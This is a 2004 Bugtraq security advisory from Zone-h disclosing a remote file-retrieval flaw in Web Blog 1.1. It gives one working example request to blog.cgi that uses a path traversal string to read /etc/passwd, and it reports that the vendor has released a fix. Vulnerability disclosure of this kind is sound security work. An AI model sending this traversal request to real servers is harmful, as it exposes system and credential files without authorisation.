[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    ZH2004-01SA (security advisory): Web Blog 1.1 Remote arbitrary
From:       ZetaLabs <zetalabs () zone-h ! org>
Date:       2004-01-28 10:15:40
Message-ID: 20040128101540.1781.qmail () www ! securityfocus ! com
[Download RAW message or body]



ZH2004-01SA (security advisory): Web Blog 1.1 Remote arbitrary files retrieving

Published: 28 january 2004

Released: 28 january 2004

Name: Web Blog

Affected Systems: 1.1

Issue: Remote file retrieving

Author: Zone-h Security Labs

Vendor: http://leifwright.com


Description

***********

Zone-h Security Team has discovered a flaw in Web Blog 1.1. There is a vulnerability \
in the current version of Web Blog that allows an attacker to retrieve arbitrary \
files from the webserver with its priviledges. Web Blog is an application to manage \
blogs.


Details

******* 


It's possibile for a remote attacker to retrieve any file from a webserver.

For example try this:

http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd





Solution:

*********

The vendor has been contacted and a new version was released.




Zone-h Security Labs - zetalabs@zone-h.org
 
http://www.zone-h.org/en/advisories/read/id=3822/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic